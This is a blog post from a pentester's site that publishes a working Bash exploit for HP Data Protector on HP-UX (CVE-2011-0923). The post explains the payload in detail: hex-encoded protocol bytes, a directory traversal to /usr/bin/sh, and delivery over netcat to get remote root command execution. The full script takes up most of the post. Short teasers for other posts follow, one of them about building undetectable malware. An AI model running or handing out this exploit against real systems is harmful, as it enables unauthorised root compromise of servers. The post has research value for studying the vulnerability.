HP Data Protector Remote Shell for HPUX

In many pentest that I have done, HPUX is one of the more commons UNIX OS that I found. It is a strong operating system running in a robust hardware, and when I got to know more about the Lights Out functionality I just fall in love. Al thought many companies uses it for running their main part of their business I have found the they don’t pay much attention on it’s security so it’s common to find production servers without patches or even running applications on insecure protocols like Telnet, FTP or even rlogin.

Since HPUX has been around for a long time and HP was concerned about its security he created the project Bastile for HPUX. I had used it to secure servers and I can say that it’s great! You have to be really careful because it closes a lot of stuff and it may, no sorry, it will broke the connectivity with your oldest applications. ( by the way, it moves the users hashes to the /tcb/files/auth/ folder ;) ). This doesn’t mean you just run tomorrow, apply the Bastille on your servers and forget about them… YOU ALSO NEED TO PATCH THE SERVER -CONSTANTLY-

So this week I was working in a Pentest and one of the main objectives was this HPUX 11.11 server, with 10 open ports and Bastille installed, it wasn’t looking so good. Looking around I found that Data Protect has this nasty vulnerability and that fdisk has created a PoC for this Zero Day but in Windows. So with a lot of help from c4an (he ported this tool to the Metasploit Project that you can see in his blog) the server was compromised with root…. w00t w00t!

So this is the code and I share it ONLY FOR EDUCATIONAL PURPOSES. I encourage you not to use it on servers that you don’t own. You can also download it from my Hacking Projects section


#!/bin/bash
# Exploit Title: HP Data Protector Remote Shell for HPUX
# Date: 2011-08-02
# Author: Adrian Puente Z.
# Software Link:http://www8.hp.com/us/en/software/software-
# product.html?compURI=tcm:245-936920&pageTitle=data-protector
# Version: 0.9
# Tested on: HPUX
# CVE: CVE-2011-0923
# Notes: ZDI-11-055
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-055/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/
# Document.jsp?objectID=c02781143
#
# Powered by Hackarandas www.hackarandas.com
# Reachme at ch0ks _at_ hackarandas _dot_ com || @ch0ks
# Lots of thanks to David Llorens (@c4an) for all the help.
# Ported to HPUX from fdisk's (@fdiskyou) Windows version.
# Windows version: http://www.exploit-db.com/exploits/17339/
#
# Shouts to shellhellboy, r3x, r0d00m, etlow,
# psymera, nitr0us and ppl in #mendozaaaa
#

[ $# -lt 3 ] && echo -en "Syntax: `basename ${0}` \n\n`basename ${0}` 10.22.33.44 5555 id \nX15 [12:1] uid=0(root) gid=0(root)
" && exit 0

HOST=`echo ${@} | awk '{print $1}'`
PORT=`echo ${@} | awk '{print $2}'`
CMD=`echo ${@} | sed 's/'$HOST'.*'${PORT}'\ \ *//g'`
SC=""
SC=${SC}"\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d"
SC=${SC}"\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68"
SC=${SC}"\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d"
SC=${SC}"\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30"
SC=${SC}"\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d"
SC=${SC}"\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30"
SC=${SC}"\x74\x2d\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f"
SC=${SC}"\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e"
SC=${SC}"\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00"
SC=${SC}"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
SC=${SC}"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
SHELLCODE=${SC}
( echo -en ${SHELLCODE} ; echo ${CMD} ) | nc -w1 ${HOST} ${PORT}

This script is in Bash and can run in any Linux like Backtrack or in Windows using Cygwin and this is how it works:

The shellcode is 168 bytes and is injected directly on the port. The first 8 bytes of the 104 bytes of this shellcode is part of the protocol where we use the flag “C 20″ to tell Data Protect (I found that if we manipulates this value other things can be accomplished even writing directly to / ) to perform the vulnerable function that allows remote connections and execute files within it’s local bin directory.


"\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d"
"\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68"
"\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d"
"\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30"
"\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d"
"\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30"
"\x74\x2d\x00\x20\x30\x00\x20\x30\x00"

but if we use the Directory Path Traversal technique we can execute any binary within the file system. The next part was tricky, I can execute any command but I am unable to pass arguments directly to it, so after some debug I found I can spawn a /usr/bin/sh closing it with some nullbytes to get the complete 168 bytes and if I concatenates the command to execute it will pass directly to the shell and execute it with the user’s environment variables, in this case root, and returns us the output.


"\x20\x2e\x2e\x2f\x2e\x2e\x2f"
"\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e"
"\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"

So at the end I get this to work doing this:


( echo -en ${SHELLCODE} ; echo ${CMD} ) | nc -w1 ${HOST} ${PORT}

The Netcat helps me to transports the shellcode to the port and it returns the output. It simply works.

So special thanks to fdisk for the PoC and David Llorens for the useful brainstorming, he also ported this tool to the Metasploit Project that you can see in his blog.

Adrian Puente Z.

Share

Updating your WordPress Blog in a blink!

I know, I know… WordPress already has an option to update your blog with one click… but I love to use my SSH and I don’t trust FTP connections, so here is my manual solution for this. I hope you find it useful. ssh myblog.com ./updateblog.sh exit That’s it, pretty fancy uh? This is the […]

Share

Reunión CUM 2010

Hace poco el buen Nitrous me comentó que se iba a armar una reunión del CUM (Comunidad Underground Mexico, no piensen mal) y despues el buen HKM autor del sitio Hakim me comentó que podía difundirlo. Bueno, les hago extensiva la invitación a la Reunión anual del CUM y espero verlos por ahi! IMPORTANTE: El […]

Share

Conferencia HUM – BugCon2010

Quiero invitarlos a mi conferencia de HUM – Homemade Undetectable Malware que voy a dar en la BugCon2010 este viernes 29 de octubre del 2010. Es parte de lo que dí en la conferencia del ITESM pero voy a agregarle mas contenido y espero ahora si me salgan los demos. Jojojo. No dejen de ir, […]

Share

Conferencia: HUM – Homemade Undetectable Malware

Tengo el gusto de anunciarles que el Profesor Arturo García conocido en el Twitter cómo @ElProfeSeguro, me ha invitado a dar una conferencia sobre HUM o Homemade Undetectable Malware en el ITESM CCM. No quiero adelantar mucho de la conferencia pero platicaré de mi experiencia creando malware indetectable cómo estos se propagan y describiré las […]

Share

Can I reach it? Small Script for Network Connectivity Test

I made this script so I can replicate a network connection test to some host. It’s really small but it works in all the cases and has some nice features as internal and external IP detection. It works in Linux, ideal for a pentest using Backtrack. Here is the Bash code. #!/bin/bash # Script by […]

Share

Uncomplicated File Wipe for *NIX

We needed to guarantee to one of our customers that a file will be securely deleted. Since the server was a HPUX Unix and we can’t compile nor install new applications, I managed to write this script to wipe the file. The file is overwritten 7 times as the US Department of Defense clearing standard […]

Share

Infographic: Phishing for Your Money

Here again with another infographic I found, now on Phishing. I hope you like it as much as I do. Technorati Tags:hackarandas, adrian puente z., infographic, phishing, gobankingrates.comGenerated By Technorati Tag Generator Sources: * http://www.gobankingrates.com/banking/protect-yourself-from-phishers-infographic/ * http://www.trusteer.com/sites/default/files/Phishing-Statistics-Dec-2009-FIN.pdf Adrián Puente Z.

Share

Infographic: A Short Story on Hacking

I found this great infographic about hacking and I thought in sharing it. I hope you found it as interesting as I did. Via: Online MBA Technorati Tags:hackarandas, adrian puente z., infographic, online mba, hackersGenerated By Technorati Tag Generator Adrián Puente Z.

Share

Google Docs introduce reconoci…

Google Docs introduce reconocimiento OCR para reconocer texto en PDFs y en imágenes http://bit.ly/c2S29g /cc @feedly

Share

Switch to our mobile site